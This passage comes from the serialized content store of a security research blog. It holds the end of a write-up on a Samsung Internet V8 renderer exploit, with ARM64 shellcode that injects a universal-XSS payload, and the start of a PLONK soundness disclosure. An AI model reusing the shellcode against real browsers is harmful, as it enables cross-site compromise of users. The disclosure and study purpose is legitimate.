#0x5ac8\n",{"type":25,"tag":216,"props":145209,"children":145210},{"class":6922,"line":7216},[145211],{"type":25,"tag":216,"props":145212,"children":145213},{},[145214],{"type":31,"value":145215},"movk x1, #0x054f, lsl #16\n",{"type":25,"tag":216,"props":145217,"children":145218},{"class":6922,"line":7244},[145219],{"type":25,"tag":216,"props":145220,"children":145221},{},[145222],{"type":31,"value":145223},"add x0, x12, x1\n",{"type":25,"tag":216,"props":145225,"children":145226},{"class":6922,"line":7257},[145227],{"type":25,"tag":216,"props":145228,"children":145229},{},[145230],{"type":31,"value":145231},"blr x9\n",{"type":25,"tag":216,"props":145233,"children":145234},{"class":6922,"line":7275},[145235],{"type":25,"tag":216,"props":145236,"children":145237},{},[145238],{"type":31,"value":145239},"// *x0 is isolate pointer\n",{"type":25,"tag":216,"props":145241,"children":145242},{"class":6922,"line":7296},[145243],{"type":25,"tag":216,"props":145244,"children":145245},{},[145246],{"type":31,"value":145247},"// store isolate ptr to stack\n",{"type":25,"tag":216,"props":145249,"children":145250},{"class":6922,"line":7305},[145251],{"type":25,"tag":216,"props":145252,"children":145253},{},[145254],{"type":31,"value":145255},"ldr x13, [x0]\n",{"type":25,"tag":216,"props":145257,"children":145258},{"class":6922,"line":7557},[145259],{"type":25,"tag":216,"props":145260,"children":145261},{},[145262],{"type":31,"value":145263},"str x13, [sp, #-16]!\n",{"type":25,"tag":216,"props":145265,"children":145266},{"class":6922,"line":7574},[145267],{"type":25,"tag":216,"props":145268,"children":145269},{"emptyLinePlaceholder":16},[145270],{"type":31,"value":7642},{"type":25,"tag":216,"props":145272,"children":145273},{"class":6922,"line":7591},[145274],{"type":25,"tag":216,"props":145275,"children":145276},{},[145277],{"type":31,"value":145278},"// store x10 = v8::String::NewFromUTF8\n",{"type":25,"tag":216,"props":145280,"children":145281},{"class":6922,"line":7604},[145282],{"type":25,"tag":216,"props":145283,"children":145284},{},[145285],{"type":31,"value":145286},"movz x1, #0x1140\n",{"type":25,"tag":216,"props":145288,"children":145289},{"class":6922,"line":7613},[145290],{"type":25,"tag":216,"props":145291,"children":145292},{},[145293],{"type":31,"value":145294},"movk x1, #0x0242, lsl #16\n",{"type":25,"tag":216,"props":145296,"children":145297},{"class":6922,"line":7636},[145298],{"type":25,"tag":216,"props":145299,"children":145300},{},[145301],{"type":31,"value":145302},"sub x10, x12, x1\n",{"type":25,"tag":216,"props":145304,"children":145305},{"class":6922,"line":7645},[145306],{"type":25,"tag":216,"props":145307,"children":145308},{"emptyLinePlaceholder":16},[145309],{"type":31,"value":7642},{"type":25,"tag":216,"props":145311,"children":145312},{"class":6922,"line":7654},[145313],{"type":25,"tag":216,"props":145314,"children":145315},{},[145316],{"type":31,"value":145317},"// mmap a RW page for our xss payload\n",{"type":25,"tag":216,"props":145319,"children":145320},{"class":6922,"line":7722},[145321],{"type":25,"tag":216,"props":145322,"children":145323},{},[145324],{"type":31,"value":143668},{"type":25,"tag":216,"props":145326,"children":145327},{"class":6922,"line":7730},[145328],{"type":25,"tag":216,"props":145329,"children":145330},{},[145331],{"type":31,"value":145332},"mov x1, #{page_align(len(XSS_PAYLOAD))}\n",{"type":25,"tag":216,"props":145334,"children":145335},{"class":6922,"line":7760},[145336],{"type":25,"tag":216,"props":145337,"children":145338},{},[145339],{"type":31,"value":145340},"mov x2, #3\n",{"type":25,"tag":216,"props":145342,"children":145343},{"class":6922,"line":7768},[145344],{"type":25,"tag":216,"props":145345,"children":145346},{},[145347],{"type":31,"value":143691},{"type":25,"tag":216,"props":145349,"children":145350},{"class":6922,"line":7800},[145351],{"type":25,"tag":216,"props":145352,"children":145353},{},[145354],{"type":31,"value":143699},{"type":25,"tag":216,"props":145356,"children":145357},{"class":6922,"line":7808},[145358],{"type":25,"tag":216,"props":145359,"children":145360},{},[145361],{"type":31,"value":143707},{"type":25,"tag":216,"props":145363,"children":145364},{"class":6922,"line":7868},[145365],{"type":25,"tag":216,"props":145366,"children":145367},{},[145368],{"type":31,"value":143715},{"type":25,"tag":216,"props":145370,"children":145371},{"class":6922,"line":13001},[145372],{"type":25,"tag":216,"props":145373,"children":145374},{},[145375],{"type":31,"value":143630},{"type":25,"tag":216,"props":145377,"children":145378},{"class":6922,"line":13019},[145379],{"type":25,"tag":216,"props":145380,"children":145381},{"emptyLinePlaceholder":16},[145382],{"type":31,"value":7642},{"type":25,"tag":216,"props":145384,"children":145385},{"class":6922,"line":13064},[145386],{"type":25,"tag":216,"props":145387,"children":145388},{},[145389],{"type":31,"value":145390},"// write our xss payload to mmapped rw page\n",{"type":25,"tag":216,"props":145392,"children":145393},{"class":6922,"line":13170},[145394],{"type":25,"tag":216,"props":145395,"children":145396},{},[145397],{"type":31,"value":145398},"{write_str(XSS_PAYLOAD, \"x0\")}\n",{"type":25,"tag":216,"props":145400,"children":145401},{"class":6922,"line":27455},[145402],{"type":25,"tag":216,"props":145403,"children":145404},{"emptyLinePlaceholder":16},[145405],{"type":31,"value":7642},{"type":25,"tag":216,"props":145407,"children":145408},{"class":6922,"line":27490},[145409],{"type":25,"tag":216,"props":145410,"children":145411},{},[145412],{"type":31,"value":145413},"// store x11 = XSS_PAYLOAD string\n",{"type":25,"tag":216,"props":145415,"children":145416},{"class":6922,"line":27498},[145417],{"type":25,"tag":216,"props":145418,"children":145419},{},[145420],{"type":31,"value":145421},"mov x11, x0\n",{"type":25,"tag":216,"props":145423,"children":145424},{"class":6922,"line":27506},[145425],{"type":25,"tag":216,"props":145426,"children":145427},{"emptyLinePlaceholder":16},[145428],{"type":31,"value":7642},{"type":25,"tag":216,"props":145430,"children":145431},{"class":6922,"line":27515},[145432],{"type":25,"tag":216,"props":145433,"children":145434},{},[145435],{"type":31,"value":145436},"// pop back isolate pointer\n",{"type":25,"tag":216,"props":145438,"children":145439},{"class":6922,"line":27557},[145440],{"type":25,"tag":216,"props":145441,"children":145442},{},[145443],{"type":31,"value":145444},"ldr x13, [sp], #16\n",{"type":25,"tag":216,"props":145446,"children":145447},{"class":6922,"line":27590},[145448],{"type":25,"tag":216,"props":145449,"children":145450},{"emptyLinePlaceholder":16},[145451],{"type":31,"value":7642},{"type":25,"tag":216,"props":145453,"children":145454},{"class":6922,"line":27598},[145455],{"type":25,"tag":216,"props":145456,"children":145457},{},[145458],{"type":31,"value":143751},{"type":25,"tag":216,"props":145460,"children":145461},{"class":6922,"line":27606},[145462],{"type":25,"tag":216,"props":145463,"children":145464},{},[145465],{"type":31,"value":145466},"// x13 = isolate *\n",{"type":25,"tag":216,"props":145468,"children":145469},{"class":6922,"line":27615},[145470],{"type":25,"tag":216,"props":145471,"children":145472},{},[145473],{"type":31,"value":145474},"// x11 = XSS_PAYLOAD string mmapped region\n",{"type":25,"tag":216,"props":145476,"children":145477},{"class":6922,"line":27691},[145478],{"type":25,"tag":216,"props":145479,"children":145480},{},[145481],{"type":31,"value":145482},"// x10 = v8::String::NewFromUtf8\n",{"type":25,"tag":216,"props":145484,"children":145485},{"class":6922,"line":27724},[145486],{"type":25,"tag":216,"props":145487,"children":145488},{"emptyLinePlaceholder":16},[145489],{"type":31,"value":7642},{"type":25,"tag":216,"props":145491,"children":145492},{"class":6922,"line":27732},[145493],{"type":25,"tag":216,"props":145494,"children":145495},{},[145496],{"type":31,"value":145497},"// call v8::String::NewFromUTF8 with our xss_payload\n",{"type":25,"tag":216,"props":145499,"children":145500},{"class":6922,"line":27740},[145501],{"type":25,"tag":216,"props":145502,"children":145503},{},[145504],{"type":31,"value":145505},"// arg0 = isolate *\n",{"type":25,"tag":216,"props":145507,"children":145508},{"class":6922,"line":27777},[145509],{"type":25,"tag":216,"props":145510,"children":145511},{},[145512],{"type":31,"value":145513},"mov x0, x13\n",{"type":25,"tag":216,"props":145515,"children":145516},{"class":6922,"line":27790},[145517],{"type":25,"tag":216,"props":145518,"children":145519},{},[145520],{"type":31,"value":145521},"// arg1 = char *c_str\n",{"type":25,"tag":216,"props":145523,"children":145524},{"class":6922,"line":27803},[145525],{"type":25,"tag":216,"props":145526,"children":145527},{},[145528],{"type":31,"value":145529},"mov x1, x11\n",{"type":25,"tag":216,"props":145531,"children":145532},{"class":6922,"line":27816},[145533],{"type":25,"tag":216,"props":145534,"children":145535},{},[145536],{"type":31,"value":145537},"// arg2 = type = kNormal\n",{"type":25,"tag":216,"props":145539,"children":145540},{"class":6922,"line":27870},[145541],{"type":25,"tag":216,"props":145542,"children":145543},{},[145544],{"type":31,"value":145545},"mov x2, #0\n",{"type":25,"tag":216,"props":145547,"children":145548},{"class":6922,"line":27879},[145549],{"type":25,"tag":216,"props":145550,"children":145551},{},[145552],{"type":31,"value":145553},"// arg4 = length\n",{"type":25,"tag":216,"props":145555,"children":145556},{"class":6922,"line":36243},[145557],{"type":25,"tag":216,"props":145558,"children":145559},{},[145560],{"type":31,"value":145561},"mov w3, #{len(XSS_PAYLOAD)}\n",{"type":25,"tag":216,"props":145563,"children":145564},{"class":6922,"line":36264},[145565],{"type":25,"tag":216,"props":145566,"children":145567},{},[145568],{"type":31,"value":145569},"// call NewFromUTF8\n",{"type":25,"tag":216,"props":145571,"children":145572},{"class":6922,"line":84923},[145573],{"type":25,"tag":216,"props":145574,"children":145575},{},[145576],{"type":31,"value":145577},"blr x10\n",{"type":25,"tag":216,"props":145579,"children":145580},{"class":6922,"line":84936},[145581],{"type":25,"tag":216,"props":145582,"children":145583},{"emptyLinePlaceholder":16},[145584],{"type":31,"value":7642},{"type":25,"tag":216,"props":145586,"children":145587},{"class":6922,"line":84944},[145588],{"type":25,"tag":216,"props":145589,"children":145590},{},[145591],{"type":31,"value":145592},"// store x14 = String XSS_PAYLOAD\n",{"type":25,"tag":216,"props":145594,"children":145595},{"class":6922,"line":84952},[145596],{"type":25,"tag":216,"props":145597,"children":145598},{},[145599],{"type":31,"value":145600},"mov x14, x0\n",{"type":25,"tag":216,"props":145602,"children":145603},{"class":6922,"line":84960},[145604],{"type":25,"tag":216,"props":145605,"children":145606},{"emptyLinePlaceholder":16},[145607],{"type":31,"value":7642},{"type":25,"tag":216,"props":145609,"children":145610},{"class":6922,"line":85000},[145611],{"type":25,"tag":216,"props":145612,"children":145613},{},[145614],{"type":31,"value":145615},"// store x9 = v8::internal::DebugEvaluate::Global\n",{"type":25,"tag":216,"props":145617,"children":145618},{"class":6922,"line":85008},[145619],{"type":25,"tag":216,"props":145620,"children":145621},{},[145622],{"type":31,"value":145623},"movz x1, #0xe44c\n",{"type":25,"tag":216,"props":145625,"children":145626},{"class":6922,"line":92194},[145627],{"type":25,"tag":216,"props":145628,"children":145629},{},[145630],{"type":31,"value":145631},"movk x1, #0x014e, lsl #16\n",{"type":25,"tag":216,"props":145633,"children":145634},{"class":6922,"line":92202},[145635],{"type":25,"tag":216,"props":145636,"children":145637},{},[145638],{"type":31,"value":145639},"sub x9, x12, x1\n",{"type":25,"tag":216,"props":145641,"children":145642},{"class":6922,"line":105535},[145643],{"type":25,"tag":216,"props":145644,"children":145645},{"emptyLinePlaceholder":16},[145646],{"type":31,"value":7642},{"type":25,"tag":216,"props":145648,"children":145649},{"class":6922,"line":105543},[145650],{"type":25,"tag":216,"props":145651,"children":145652},{},[145653],{"type":31,"value":145654},"// call v8::internal::DebugEvaluate::Global\n",{"type":25,"tag":216,"props":145656,"children":145657},{"class":6922,"line":105551},[145658],{"type":25,"tag":216,"props":145659,"children":145660},{},[145661],{"type":31,"value":145505},{"type":25,"tag":216,"props":145663,"children":145664},{"class":6922,"line":105559},[145665],{"type":25,"tag":216,"props":145666,"children":145667},{},[145668],{"type":31,"value":145513},{"type":25,"tag":216,"props":145670,"children":145671},{"class":6922,"line":105587},[145672],{"type":25,"tag":216,"props":145673,"children":145674},{},[145675],{"type":31,"value":145676},"// arg1 = String *source\n",{"type":25,"tag":216,"props":145678,"children":145679},{"class":6922,"line":108358},[145680],{"type":25,"tag":216,"props":145681,"children":145682},{},[145683],{"type":31,"value":145684},"mov x1, x14\n",{"type":25,"tag":216,"props":145686,"children":145687},{"class":6922,"line":108366},[145688],{"type":25,"tag":216,"props":145689,"children":145690},{},[145691],{"type":31,"value":145692},"// arg2 = mode = kDefault\n",{"type":25,"tag":216,"props":145694,"children":145696},{"class":6922,"line":145695},69,[145697],{"type":25,"tag":216,"props":145698,"children":145699},{},[145700],{"type":31,"value":145545},{"type":25,"tag":216,"props":145702,"children":145704},{"class":6922,"line":145703},70,[145705],{"type":25,"tag":216,"props":145706,"children":145707},{},[145708],{"type":31,"value":145709},"// arg3 = repl_mode = kYes\n",{"type":25,"tag":216,"props":145711,"children":145713},{"class":6922,"line":145712},71,[145714],{"type":25,"tag":216,"props":145715,"children":145716},{},[145717],{"type":31,"value":145718},"mov x3, #0\n",{"type":25,"tag":216,"props":145720,"children":145722},{"class":6922,"line":145721},72,[145723],{"type":25,"tag":216,"props":145724,"children":145725},{"emptyLinePlaceholder":16},[145726],{"type":31,"value":7642},{"type":25,"tag":216,"props":145728,"children":145730},{"class":6922,"line":145729},73,[145731],{"type":25,"tag":216,"props":145732,"children":145733},{},[145734],{"type":31,"value":145231},{"type":25,"tag":606,"props":145736,"children":145738},{"id":145737},"uxss-demo",[145739],{"type":31,"value":145740},"UXSS Demo",{"type":25,"tag":38,"props":145742,"children":145743},{},[145744,145746,145752],{"type":31,"value":145745},"Below is a demo that executes the following UXSS payload: ",{"type":25,"tag":82,"props":145747,"children":145749},{"className":145748},[],[145750],{"type":31,"value":145751},"alert(document.domain); window.location.href = \"https://cor.team/\";",{"type":31,"value":179},{"type":25,"tag":135790,"props":145754,"children":145757},{"className":145755,"controls":16},[145756],"blog-video-responsive",[145758,145760,145764],{"type":31,"value":145759},"\n  ",{"type":25,"tag":144995,"props":145761,"children":145763},{"src":145762,"type":135788},"/posts/mobile-renderer-rce/demo.mp4",[],{"type":31,"value":145765},"\n  Your browser does not support the video tag.\n",{"type":25,"tag":26,"props":145767,"children":145768},{"id":32892},[145769],{"type":31,"value":22907},{"type":25,"tag":38,"props":145771,"children":145772},{},[145773],{"type":31,"value":145774},"Given the complex nature of the modern software ecosystem, it is unsurprising to find core out of date libraries in popular applications. Samsung Internet relied on a six month old version of V8, a JavaScript engine where researchers frequently discover new vulnerabilities, providing us a large window for n-day exploitation.",{"type":25,"tag":38,"props":145776,"children":145777},{},[145778],{"type":31,"value":145779},"While renderer bugs are usually chained with another exploit such as a sandbox escape, we pushed the capabilities of the bug by targeting the weaker Site Isolation mechanism on mobile. As most web pages ran under the same process, we could inject shellcode into the JavaScript interpreter to achieve universal XSS in Samsung Internet browser.",{"type":25,"tag":9316,"props":145781,"children":145782},{},[145783],{"type":31,"value":9320},{"title":7,"searchDepth":6769,"depth":6769,"links":145785},[145786,145790,145793,145803],{"id":32975,"depth":6769,"text":32978,"children":145787},[145788,145789],{"id":135924,"depth":6778,"text":135927},{"id":136007,"depth":6778,"text":136010},{"id":136040,"depth":6769,"text":136043,"children":145791},[145792],{"id":136181,"depth":6778,"text":136035},{"id":136325,"depth":6769,"text":136328,"children":145794},[145795,145796,145797,145798,145799,145800,145801,145802],{"id":136331,"depth":6778,"text":136334},{"id":136788,"depth":6778,"text":136791},{"id":136971,"depth":6778,"text":136974},{"id":137082,"depth":6778,"text":137085},{"id":137359,"depth":6778,"text":137362},{"id":140068,"depth":6778,"text":140071},{"id":143349,"depth":6778,"text":143352},{"id":145737,"depth":6778,"text":145740},{"id":32892,"depth":6769,"text":22907},"content:blog:2026-04-01-patch-gap-to-mobile-renderer-rce.md","blog/2026-04-01-patch-gap-to-mobile-renderer-rce.md","blog/2026-04-01-patch-gap-to-mobile-renderer-rce",{"_path":145808,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":145809,"description":145810,"date":145811,"author":145812,"image":145813,"isFeatured":16,"onBlogPage":16,"tags":145815,"body":145818,"_type":6798,"_id":151080,"_source":6800,"_file":151081,"_stem":151082,"_extension":6803},"/blog/2026-04-30-unverified-evaluations-dusk-plonk","Unverified Evaluations in Dusk's PLONK","Dusk's privacy layer protects ~$60M of DUSK and hinges on one proof check. dusk-plonk's verifier never validated four of the prover's polynomial commitments, enough to mint DUSK from nothing and forge shielded spends the network confirmed as real.","2026-04-30T12:00:00.000Z",[111796,111797],{"src":145814,"width":101226,"height":17580},"/posts/dusk-commitment-issues/title.png",[145816,145817],"dusk","plonk",{"type":22,"children":145819,"toc":151060},[145820,145826,145867,145879,145885,145899,145904,145910,146201,146205,146476,146705,146711,147396,147400,147895,147903,147909,147928,147933,147939,148164,148203,148214,148220,148231,148939,148944,148947,148953,149006,149041,149073,149078,149082,149085,149091,149102,149115,149146,149213,149221,149243,149256,149683,149706,149711,149714,149719,149746,149842,149853,149900,149938,149949,150287,150304,150312,150315,150321,150326,150360,150368,150449,150452,150458,150472,150490,150495,150535,150543,150564,150567,150573,150578,150643,150657,150660,150666,150706,150717,150722,150727,150733,150747,150828,150849,150876,150879,150885,150899,150904,150909,150914,151049,151055],{"type":25,"tag":453,"props":145821,"children":145823},{"id":145822},"commitment-issues-unverified-evaluations-in-dusks-plonk",[145824],{"type":31,"value":145825},"Commitment Issues: Unverified Evaluations in Dusk's PLONK",{"type":25,"tag":38,"props":145827,"children":145828},{},[145829,145831,145838,145840,145847,145849,145856,145858,145865],{"type":31,"value":145830},"We found a critical soundness vulnerability in ",{"type":25,"tag":162,"props":145832,"children":145835},{"href":145833,"rel":145834},"https://github.com/dusk-network/plonk/",[166],[145836],{"type":31,"value":145837},"dusk-plonk",{"type":31,"value":145839},", the PLONK implementation powering ",{"type":25,"tag":162,"props":145841,"children":145844},{"href":145842,"rel":145843},"https://dusk.network/",[166],[145845],{"type":31,"value":145846},"Dusk Network's",{"type":31,"value":145848}," ~$60M ",{"type":25,"tag":162,"props":145850,"children":145853},{"href":145851,"rel":145852},"https://www.coingecko.com/en/coins/dusk",[166],[145854],{"type":31,"value":145855},"market cap",{"type":31,"value":145857},". By exploiting a gap in the verification step, a malicious prover could forge verifying proofs for arbitrary false statements, bypassing every constraint in the transaction circuit. On the live ",{"type":25,"tag":162,"props":145859,"children":145862},{"href":145860,"rel":145861},"https://github.com/dusk-network/rusk",[166],[145863],{"type":31,"value":145864},"Rusk",{"type":31,"value":145866}," network, this would have enabled minting arbitrary amounts of DUSK and moving forged shielded funds through the normal Phoenix path.",{"type":25,"tag":38,"props":145868,"children":145869},{},[145870,145872,145877],{"type":31,"value":145871},"The root cause was that the prover slipped four public selector evaluations into the proof struct, and the verifier consumed them in its final equation ",{"type":25,"tag":9273,"props":145873,"children":145874},{},[145875],{"type":31,"value":145876},"without ever validating them against the trusted commitments in the verifier key.",{"type":31,"value":145878}," The prover can set them to whatever values make the equation pass.",{"type":25,"tag":26,"props":145880,"children":145882},{"id":145881},"how-plonk-works-briefly",[145883],{"type":31,"value":145884},"How PLONK works (briefly)",{"type":25,"tag":38,"props":145886,"children":145887},{},[145888,145890,145897],{"type":31,"value":145889},"For a rigorous treatment see the ",{"type":25,"tag":162,"props":145891,"children":145894},{"href":145892,"rel":145893},"https://eprint.iacr.org/2019/953",[166],[145895],{"type":31,"value":145896},"original paper",{"type":31,"value":145898},"; what follows covers only the parts needed to understand the bug.",{"type":25,"tag":38,"props":145900,"children":145901},{},[145902],{"type":31,"value":145903},"A prover wants to convince a verifier that it knows secret inputs satisfying some computation (an arithmetic circuit) without revealing those inputs, and the resulting proof should be short and quick to verify.",{"type":25,"tag":606,"props":145905,"children":145907},{"id":145906},"arithmetic-circuits-and-constraints",[145908],{"type":31,"value":145909},"Arithmetic circuits and constraints",{"type":25,"tag":38,"props":145911,"children":145912},{},[145913,145915,145964,145966,146115,146117,146200],{"type":31,"value":145914},"An arithmetic circuit is a series of addition and multiplication gates wired together. An example would be proving that we know of some point ",{"type":25,"tag":82,"props":145916,"children":145918},{"className":145917},[212,4702],[145919],{"type":25,"tag":216,"props":145920,"children":145922},{"className":145921},[224],[145923],{"type":25,"tag":216,"props":145924,"children":145926},{"className":145925,"ariaHidden":230},[229],[145927],{"type":25,"tag":216,"props":145928,"children":145930},{"className":145929},[235],[145931,145935,145940,145945,145950,145954,145959],{"type":25,"tag":216,"props":145932,"children":145934},{"className":145933,"style":5513},[240],[],{"type":25,"tag":216,"props":145936,"children":145938},{"className":145937},[287],[145939],{"type":31,"value":1850},{"type":25,"tag":216,"props":145941,"children":145943},{"className":145942},[246,2151],[145944],{"type":31,"value":2541},{"type":25,"tag":216,"props":145946,"children":145948},{"className":145947},[1864],[145949],{"type":31,"value":1867},{"type":25,"tag":216,"props":145951,"children":145953},{"className":145952,"style":1871},[257],[],{"type":25,"tag":216,"props":145955,"children":145957},{"className":145956,"style":2325},[246,2151],[145958],{"type":31,"value":7064},{"type":25,"tag":216,"props":145960,"children":145962},{"className":145961},[427],[145963],{"type":31,"value":1888},{"type":31,"value":145965}," on an elliptic curve, by e.g proving that ",{"type":25,"tag":82,"props":145967,"children":145969},{"className":145968},[212,4702],[145970],{"type":25,"tag":216,"props":145971,"children":145973},{"className":145972},[224],[145974],{"type":25,"tag":216,"props":145975,"children":145977},{"className":145976,"ariaHidden":230},[229],[145978,146040,146102],{"type":25,"tag":216,"props":145979,"children":145981},{"className":145980},[235],[145982,145986,146027,146031,146036],{"type":25,"tag":216,"props":145983,"children":145985},{"className":145984,"style":127316},[240],[],{"type":25,"tag":216,"props":145987,"children":145989},{"className":145988},[246],[145990,145995],{"type":25,"tag":216,"props":145991,"children":145993},{"className":145992,"style":2325},[246,2151],[145994],{"type":31,"value":7064},{"type":25,"tag":216,"props":145996,"children":145998},{"className":145997},[2159],[145999],{"type":25,"tag":216,"props":146000,"children":146002},{"className":146001},[298],[146003],{"type":25,"tag":216,"props":146004,"children":146006},{"className":146005},[304],[146007],{"type":25,"tag":216,"props":146008,"children":146010},{"className":146009,"style":7974},[309],[146011],{"type":25,"tag":216,"props":146012,"children":146013},{"style":6104},[146014,146018],{"type":25,"tag":216,"props":146015,"children":146017},{"className":146016,"style":2181},[319],[],{"type":25,"tag":216,"props":146019,"children":146021},{"className":146020},[2186,2187,2188,2189],[146022],{"type":25,"tag":216,"props":146023,"children":146025},{"className":146024},[246,2189],[146026],{"type":31,"value":331},{"type":25,"tag":216,"props":146028,"children":146030},{"className":146029,"style":258},[257],[],{"type":25,"tag":216,"props":146032,"children":146034},{"className":146033},[263],[146035],{"type":31,"value":266},{"type":25,"tag":216,"props":146037,"children":146039},{"className":146038,"style":258},[257],[],{"type":25,"tag":216,"props":146041,"children":146043},{"className":146042},[235],[146044,146048,146089,146093,146098],{"type":25,"tag":216,"props":146045,"children":146047},{"className":146046,"style":127191},[240],[],{"type":25,"tag":216,"props":146049,"children":146051},{"className":146050},[246],[146052,146057],{"type":25,"tag":216,"props":146053,"children":146055},{"className":146054},[246,2151],[146056],{"type":31,"value":2541},{"type":25,"tag":216,"props":146058,"children":146060},{"className":146059},[2159],[146061],{"type":25,"tag":216,"props":146062,"children":146064},{"className":146063},[298],[146065],{"type":25,"tag":216,"props":146066,"children":146068},{"className":146067},[304],[146069],{"type":25,"tag":216,"props":146070,"children":146072},{"className":146071,"style":7974},[309],[146073],{"type":25,"tag":216,"props":146074,"children":146075},{"style":6104},[146076,146080],{"type":25,"tag":216,"props":146077,"children":146079},{"className":146078,"style":2181},[319],[],{"type":25,"tag":216,"props":146081,"children":146083},{"className":146082},[2186,2187,2188,2189],[146084],{"type":25,"tag":216,"props":146085,"children":146087},{"className":146086},[246,2189],[146088],{"type":31,"value":21253},{"type":25,"tag":216,"props":146090,"children":146092},{"className":146091,"style":335},[257],[],{"type":25,"tag":216,"props":146094,"children":146096},{"className":146095},[340],[146097],{"type":31,"value":3539},{"type":25,"tag":216,"props":146099,"children":146101},{"className":146100,"style":335},[257],[],{"type":25,"tag":216,"props":146103,"children":146105},{"className":146104},[235],[146106,146110],{"type":25,"tag":216,"props":146107,"children":146109},{"className":146108,"style":5293},[240],[],{"type":25,"tag":216,"props":146111,"children":146113},{"className":146112},[246],[146114],{"type":31,"value":58639},{"type":31,"value":146116},", here in ",{"type":25,"tag":82,"props":146118,"children":146120},{"className":146119},[212,4702],[146121],{"type":25,"tag":216,"props":146122,"children":146124},{"className":146123},[224],[146125],{"type":25,"tag":216,"props":146126,"children":146128},{"className":146127,"ariaHidden":230},[229],[146129],{"type":25,"tag":216,"props":146130,"children":146132},{"className":146131},[235],[146133,146138],{"type":25,"tag":216,"props":146134,"children":146137},{"className":146135,"style":146136},[240],"height:0.8389em;vertical-align:-0.15em;",[],{"type":25,"tag":216,"props":146139,"children":146141},{"className":146140},[246],[146142,146147],{"type":25,"tag":216,"props":146143,"children":146145},{"className":146144},[246,125758],[146146],{"type":31,"value":5947},{"type":25,"tag":216,"props":146148,"children":146150},{"className":146149},[2159],[146151],{"type":25,"tag":216,"props":146152,"children":146154},{"className":146153},[298,299],[146155,146189],{"type":25,"tag":216,"props":146156,"children":146158},{"className":146157},[304],[146159,146184],{"type":25,"tag":216,"props":146160,"children":146162},{"className":146161,"style":97069},[309],[146163],{"type":25,"tag":216,"props":146164,"children":146165},{"style":2274},[146166,146170],{"type":25,"tag":216,"props":146167,"children":146169},{"className":146168,"style":2181},[319],[],{"type":25,"tag":216,"props":146171,"children":146173},{"className":146172},[2186,2187,2188,2189],[146174],{"type":25,"tag":216,"props":146175,"children":146177},{"className":146176},[246,2189],[146178],{"type":25,"tag":216,"props":146179,"children":146181},{"className":146180},[246,2189],[146182],{"type":31,"value":146183},"37",{"type":25,"tag":216,"props":146185,"children":146187},{"className":146186},[408],[146188],{"type":31,"value":411},{"type":25,"tag":216,"props":146190,"children":146192},{"className":146191},[304],[146193],{"type":25,"tag":216,"props":146194,"children":146196},{"className":146195,"style":2209},[309],[146197],{"type":25,"tag":216,"props":146198,"children":146199},{},[],{"type":31,"value":179},{"type":25,"tag":146202,"props":146203,"children":146204},"arithmetic-circuit-widget",{},[],{"type":25,"tag":38,"props":146206,"children":146207},{},[146208,146210,146236,146238,146316,146318,146395,146397,146474],{"type":31,"value":146209},"Each gate ",{"type":25,"tag":82,"props":146211,"children":146213},{"className":146212},[212,4702],[146214],{"type":25,"tag":216,"props":146215,"children":146217},{"className":146216},[224],[146218],{"type":25,"tag":216,"props":146219,"children":146221},{"className":146220,"ariaHidden":230},[229],[146222],{"type":25,"tag":216,"props":146223,"children":146225},{"className":146224},[235],[146226,146231],{"type":25,"tag":216,"props":146227,"children":146230},{"className":146228,"style":146229},[240],"height:0.6595em;",[],{"type":25,"tag":216,"props":146232,"children":146234},{"className":146233},[246,2151],[146235],{"type":31,"value":2289},{"type":31,"value":146237}," has a left input ",{"type":25,"tag":82,"props":146239,"children":146241},{"className":146240},[212,4702],[146242],{"type":25,"tag":216,"props":146243,"children":146245},{"className":146244},[224],[146246],{"type":25,"tag":216,"props":146247,"children":146249},{"className":146248,"ariaHidden":230},[229],[146250],{"type":25,"tag":216,"props":146251,"children":146253},{"className":146252},[235],[146254,146258],{"type":25,"tag":216,"props":146255,"children":146257},{"className":146256,"style":5613},[240],[],{"type":25,"tag":216,"props":146259,"children":146261},{"className":146260},[246],[146262,146267],{"type":25,"tag":216,"props":146263,"children":146265},{"className":146264,"style":97029},[246,2151],[146266],{"type":31,"value":97032},{"type":25,"tag":216,"props":146268,"children":146270},{"className":146269},[2159],[146271],{"type":25,"tag":216,"props":146272,"children":146274},{"className":146273},[298,299],[146275,146305],{"type":25,"tag":216,"props":146276,"children":146278},{"className":146277},[304],[146279,146300],{"type":25,"tag":216,"props":146280,"children":146282},{"className":146281,"style":2270},[309],[146283],{"type":25,"tag":216,"props":146284,"children":146286},{"style":146285},"top:-2.55em;margin-left:-0.0197em;margin-right:0.05em;",[146287,146291],{"type":25,"tag":216,"props":146288,"children":146290},{"className":146289,"style":2181},[319],[],{"type":25,"tag":216,"props":146292,"children":146294},{"className":146293},[2186,2187,2188,2189],[146295],{"type":25,"tag":216,"props":146296,"children":146298},{"className":146297},[246,2151,2189],[146299],{"type":31,"value":2289},{"type":25,"tag":216,"props":146301,"children":146303},{"className":146302},[408],[146304],{"type":31,"value":411},{"type":25,"tag":216,"props":146306,"children":146308},{"className":146307},[304],[146309],{"type":25,"tag":216,"props":146310,"children":146312},{"className":146311,"style":2209},[309],[146313],{"type":25,"tag":216,"props":146314,"children":146315},{},[],{"type":31,"value":146317},", right input ",{"type":25,"tag":82,"props":146319,"children":146321},{"className":146320},[212,4702],[146322],{"type":25,"tag":216,"props":146323,"children":146325},{"className":146324},[224],[146326],{"type":25,"tag":216,"props":146327,"children":146329},{"className":146328,"ariaHidden":230},[229],[146330],{"type":25,"tag":216,"props":146331,"children":146333},{"className":146332},[235],[146334,146338],{"type":25,"tag":216,"props":146335,"children":146337},{"className":146336,"style":4827},[240],[],{"type":25,"tag":216,"props":146339,"children":146341},{"className":146340},[246],[146342,146347],{"type":25,"tag":216,"props":146343,"children":146345},{"className":146344,"style":2752},[246,2151],[146346],{"type":31,"value":97829},{"type":25,"tag":216,"props":146348,"children":146350},{"className":146349},[2159],[146351],{"type":25,"tag":216,"props":146352,"children":146354},{"className":146353},[298,299],[146355,146384],{"type":25,"tag":216,"props":146356,"children":146358},{"className":146357},[304],[146359,146379],{"type":25,"tag":216,"props":146360,"children":146362},{"className":146361,"style":2270},[309],[146363],{"type":25,"tag":216,"props":146364,"children":146365},{"style":2774},[146366,146370],{"type":25,"tag":216,"props":146367,"children":146369},{"className":146368,"style":2181},[319],[],{"type":25,"tag":216,"props":146371,"children":146373},{"className":146372},[2186,2187,2188,2189],[146374],{"type":25,"tag":216,"props":146375,"children":146377},{"className":146376},[246,2151,2189],[146378],{"type":31,"value":2289},{"type":25,"tag":216,"props":146380,"children":146382},{"className":146381},[408],[146383],{"type":31,"value":411},{"type":25,"tag":216,"p